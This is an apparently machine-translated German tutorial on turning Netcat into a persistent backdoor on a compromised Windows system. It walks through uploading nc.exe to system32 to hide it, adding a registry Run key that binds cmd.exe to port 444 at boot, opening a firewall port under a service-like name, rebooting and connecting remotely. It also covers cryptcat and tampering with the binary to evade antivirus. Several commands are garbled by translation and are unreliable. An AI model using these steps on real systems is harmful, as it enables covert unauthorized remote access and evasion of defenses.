NetCat

Kali Linux NetCat Persistent Agents

Kali Linux NetCat Persistent Agents
In diesem Artikel werden wir die Dinge durchgehen, die Sie mit einem Netzwerkdienstprogramm namens Netcat, dem Schweizer Taschenmesser der Netzwerktools, machen können.

Einführung:

Netcat ist ein Netzwerkdienstprogramm, das sowohl UDP- als auch TCP-Ports lesen und schreiben kann. Es wird oft als das Schweizer Taschenmesser unter den Hacking-Tools bezeichnet, da es bei Hacking-Abenteuern sowohl als Client als auch als Server mehrere Dinge tun kann. Wir werden es oft verwenden, um Binde- und Reverse-Shells-Haube um Berichte zu erstellen, um zu sehen, was passiert, und um Dateien zwischen Maschinen zu senden. Shell ist eine Möglichkeit, mit einem Computer wie eine Eingabeaufforderung unter Windows oder ein Terminal unter Linux zu interagieren. Netcat ermöglicht es uns, viele Dinge wie Reverse Shelfs auszuführen, zwischen zwei oder mehr Computern zu kommunizieren und Ihnen eine Vielzahl von Funktionen zu ermöglichen. Netcat ist in der Lage, mit seinen einfachen Befehlsargumenten Port-Scans durchzuführen und eine Verbindung zu offenen Ports herzustellen. Es ist auch in der Lage, Dateien zu senden und eine Remote-Verwaltung entweder über eine direkte oder eine Reverse-Shell bereitzustellen.

Netcat als persistenten Agenten einsetzen:

Netcat ist ein äußerst vielseitiges und nützliches Programm. Ich habe bereits in diesem Artikel erwähnt, dass es verwendet wird, um zwischen zwei Computern zu kommunizieren. Es kann auch verwendet werden, wenn Sie Persistenz installieren möchten. Netcat kann als Hintertür verwendet werden. Beginnen wir also mit dem Erstellen einer persistenten Shell auf dem kompromittierten System mithilfe von Netcat. Wir werden -nc . verwenden.exe, wie es der Name der ausführbaren Datei ist. Aber wenn Sie es vor der Verwendung umbenennen, minimiert es die Wahrscheinlichkeit einer Entdeckung. Aber auch nach der Umbenennung kann eine Antivirensoftware sie erkennen. Viele Hacker ändern einige der Elemente des Quellcodes von Netcat, die unnötig sind, und kompilieren ihn vor der Verwendung neu. Diese Änderungen machen Netcat für Antivirensoftware unsichtbar invisible.

Auf Kali wird Netcat in den /usr/share/windows-binaries gespeichert. Um es auf das kompromittierte System hochzuladen, verwenden Sie den Befehl in meterpreter:

$ meterpreter> upload/usr/share/windows-binaries/nc.exe C:\\WINDOWS\\system32

Es gibt viele Dateitypen in diesem Ordner, um eine Datei in einem kompromittierten System zu verstecken, ist dies der beste Ort

Sie können auch ein Trivial-Dateiübertragungsprotokoll verwenden, wenn Sie keine Meterpreter-Verbindung haben, um die Datei zu übertragen.

Der nächste Schritt besteht darin, die Registrierung so zu konfigurieren, dass Sie Netcat beim Systemstart starten und sicherstellen können, dass es auf Port 444 lauscht. Verwenden Sie den unten angegebenen Befehl:

$ meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\
aktuelle Version\\run -vv nc -d 'C:\\windows\\system32\\nc.exe-Ldp 444
-e cmd.exe'

Nachdem Sie den oben genannten Befehl verwendet haben, verwenden Sie den folgenden queryval-Befehl, um eine erfolgreiche Implementierung der Änderung in der Registrierung sicherzustellen.

$ meterpreter> reg queryval -kHKLM\\software\\microsoft\\windows\\
aktuelle Version\\run -vv nc

Öffnen Sie einen Port auf einer lokalen Firewall, um zu bestätigen, dass das kompromittierte System Remote-Verbindungen zu Netcat akzeptiert, indem Sie den Befehl $netsh verwenden. Das Betriebssystem des Ziels zu kennen ist von größter Bedeutung. Der für Windows Vista, Windows Server 2008 verwendete Befehlszeilenkontext ist

$ netsh advfirewall

Für frühere Systeme wird der Befehl $netsh Firewall verwendet. Geben Sie den Shell-Befehl an der Meterpreter-Eingabeaufforderung ein, um den Port zur lokalen Windows-Firewall hinzuzufügen, geben Sie rule mit dem entsprechenden Befehl ein. Für die ordnungsgemäße Funktion des Systems, Benutzername wie 'svchostpassthrough' beim Benennen der Regel. Ein Beispielbefehl wird wie folgt angezeigt:

$ C:\Windows\system32> netsh Firewall Portöffnung hinzufügen add
TCP 444 "Dienst-Pass-Through"

Um zu bestätigen, dass die Änderung erfolgreich implementiert wurde, verwenden Sie den folgenden Befehl:

$ C:\windows\system32> netsh Firewall zeigt Portöffnung an

Stellen Sie nach der Bestätigung der Portregel sicher, dass die Neustartoption funktioniert.

Geben Sie den folgenden Befehl an der Meterpreter-Eingabeaufforderung ein:

$ meterpreter> neu starten

Geben Sie in einer interaktiven Windows-Shell den folgenden Befehl ein:

$ C:\windows\system32> herunterfahren -r -t 00

Um aus der Ferne auf das kompromittierte System zuzugreifen, geben Sie $nc an einer Eingabeaufforderung ein, geben Sie die Ausführlichkeit der Verbindung an (-v und -vv melden grundlegende Informationen, bzw. viel mehr Informationen) und geben Sie dann die IP-Adresse des Ziels und die Portnummer ein.

$ nc -v 192.168.43.128 444

Leider hat Netcat einige Einschränkungen, die darin bestehen, dass die übertragenen Daten nicht authentifiziert werden und Antivirensoftware dies erkennen kann. Das Problem der geringeren Verschlüsselung kann jedoch durch die Verwendung von cryptcat gelöst werden, das eine Alternative zu Netcat ist. Während der Übertragung zwischen dem ausgenutzten Host und dem Angreifer sichert es die Daten durch die Twofish-Verschlüsselung. Es ist nicht falsch zu sagen, dass es einen ausreichend starken Schutz für verschlüsselte Daten bietet.

Stellen Sie sicher, dass ein Listener bereit und mit einem starken Passwort konfiguriert ist, um cryptcat zu verwenden, verwenden Sie den folgenden Befehl:

$ sudo cryptcat -k Passwort -l -p 444

Der nächste Schritt besteht darin, cryptcat auf das kompromittierte System hochzuladen und es mit dem folgenden Befehl so zu konfigurieren, dass es sich mit der IP-Adresse des Listeners verbindet:

$ C:\cryptcat -k Passwort 444

Es ist bedauerlich zu sagen, dass Netcat und seine Varianten von Antivirensoftware erkannt werden können. Wenn Sie einen Hex-Editor verwenden, um den Quellcode von Netcat zu ändern, besteht die Möglichkeit, dass Netcat unentdeckt bleibt. Aber es ist ein langer Trial-and-Error-Prozess. Ein zuverlässigerer Ansatz ist die Verwendung der Persistenzmechanismen des Metasploit Frameworks.

Fazit:

NETCAT ist ein Schweizer Taschenmesser, das für effizientes Hacken verwendet wird. Es kann mehrere Funktionen ausführen, um auf den Server und den Client zuzugreifen. Dieser Artikel gibt Ihnen eine kurze Beschreibung der Funktion und Verwendung von NETCAT. Ich hoffe, es hat dir gefallen, wenn dir dieser Artikel geholfen hat, dann teile ihn mit deinen Freunden. Zögern Sie nicht, uns bei allen Fragen zu NETCAT . zu stellen. Sie können auch Ihre Meinung und weitere Details teilen.

SuperTuxKart für Linux
SuperTuxKart ist ein großartiger Titel, der entwickelt wurde, um Ihnen das Mario Kart-Erlebnis kostenlos auf Ihrem Linux-System zu bieten. Es ist ziem...
Battle for Wesnoth-Tutorial
The Battle for Wesnoth ist eines der beliebtesten Open-Source-Strategiespiele, die Sie derzeit spielen können. Dieses Spiel befindet sich nicht nur se...
0 A.D. Lernprogramm
Von den vielen Strategiespielen da draußen, 0 A.D. schafft es, sich trotz Open Source als umfassender Titel und sehr tiefgehendes, taktisches Spiel ab...